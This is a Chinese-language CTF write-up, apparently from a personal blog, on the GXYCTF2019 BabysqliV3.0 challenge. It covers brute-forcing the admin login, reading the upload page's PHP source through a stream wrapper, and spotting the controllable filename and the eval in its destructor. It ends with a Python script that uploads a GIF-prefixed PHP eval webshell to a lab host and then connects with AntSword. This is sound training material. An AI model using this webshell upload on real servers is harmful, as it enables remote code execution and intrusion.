2021-09-21  /2021/09/21/GXYCTF2019-BabysqliV3.0/ 99+   2 分钟   0.4 k0次访问

GXYCTF2019-BabysqliV3.0

摘要
文件上传、phar反序列化


#### 爆破

进入题目是一个登录界面,可知用户名是admin,爆破得密码为password,进入上传页面

源码读取

页面通过file参数加载文件,伪协议读取upload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<form action="" method="post" enctype="multipart/form-data">
    上传文件
    <input type="file" name="file" />
    <input type="submit" name="submit" value="上传" />
</form>

<?php
error_reporting(0);
class Uploader{
    public $Filename;
    public $cmd;
    public $token;


    function __construct(){
        $sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
        $ext = ".txt";
        @mkdir($sandbox, 0777, true);
        if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
            $this->Filename = $_GET['name'];
        }
        else{
            $this->Filename = $sandbox.$_SESSION['user'].$ext;
        }

        $this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
        $this->token = $_SESSION['user'];
    }

    function upload($file){
        global $sandbox;
        global $ext;

        if(preg_match("[^a-z0-9]", $this->Filename)){
            $this->cmd = "die('illegal filename!');";
        }
        else{
            if($file['size'] > 1024){
                $this->cmd = "die('you are too big (′▽`〃)');";
            }
            else{
                $this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
            }
        }
    }

    function __toString(){
        global $sandbox;
        global $ext;
        // return $sandbox.$this->Filename.$ext;
        return $this->Filename;
    }

    function __destruct(){
        if($this->token != $_SESSION['user']){
            $this->cmd = "die('check token falied!');";
        }
        eval($this->cmd);
    }
}

if(isset($_FILES['file'])) {
    $uploader = new Uploader();
    $uploader->upload($_FILES["file"]);
    if(@file_get_contents($uploader)){
        echo "下面是你上传的文件:<br>".$uploader."<br>";
        echo file_get_contents($uploader);
    }
}

?>

这filename就直接控制了……

flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# coding : utf-8

import requests

shell = "<?php @eval($_POST['ok']) ?>"

prefix = "GIF8!"
#   GIF8!
#   \xff\xd8
#   #define  counter_width 40 \n#define  counter_height 10

con = prefix + "\n" + shell

url = "http://52b220e2-8b31-4060-bb76-cb7660d396fe.node4.buuoj.cn:81/upload.php?name=a.php"
cookie = {"PHPSESSID": "6d3b93db04ced5af36d7fbc5fe9771a2"}

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'}
files = {
    'file': ('1.php', con, 'image/jpeg'),
}

response = requests.post(url=url, headers=headers, files=files, cookies=cookie)

res = response.text
print(res)

蚁剑连接,找flag.php获取flag……

phar

[GXYCTF2019]BabysqliV3.0-phar反序列化

GXYCTF2019-BabysqliV3.0

http://example.com/2021/09/21/GXYCTF2019-BabysqliV3.0/

作者

inanb

发布于

2021-09-21

更新于

2021-09-21

许可协议

# 相关文章
  1.CISCN2019-总决赛-Day1-Web4-Laravel1
  2.网鼎杯-2020-青龙组-filejava
  3.实验--通过FTP_SSRF_攻击PHP-FPM
  4.实验--SSRF_PHP-FPM
  5.实验--PHP-FPM_未授权访问漏洞
  6.天翼杯-2021-esay_eval
  7.SUCTF-2018-MultiSQL
  8.DDCTF-2019-homebrew event loop
# 推荐文章
  1.Black-Watch-入群题-Web
  2.DDCTF-2019-homebrew event loop
  3.GYCTF2020-EasyThinking
  4.GXYCTF2019-BabysqliV3.0
  5.GYCTF2020-Easyphp
  6.HFCTF2020-JustEscape

喜欢这篇文章?打赏一下作者吧

关注我

:D 一言句子获取中...

链接

最新文章

分类

归档

标签

buuctf29
Buuctf5
PHP2
RCE2
php变量覆盖2
伪协议2
Buuctf PHP代码审计 文件包含1
Buuctf SQL1
Html和css1

订阅更新

×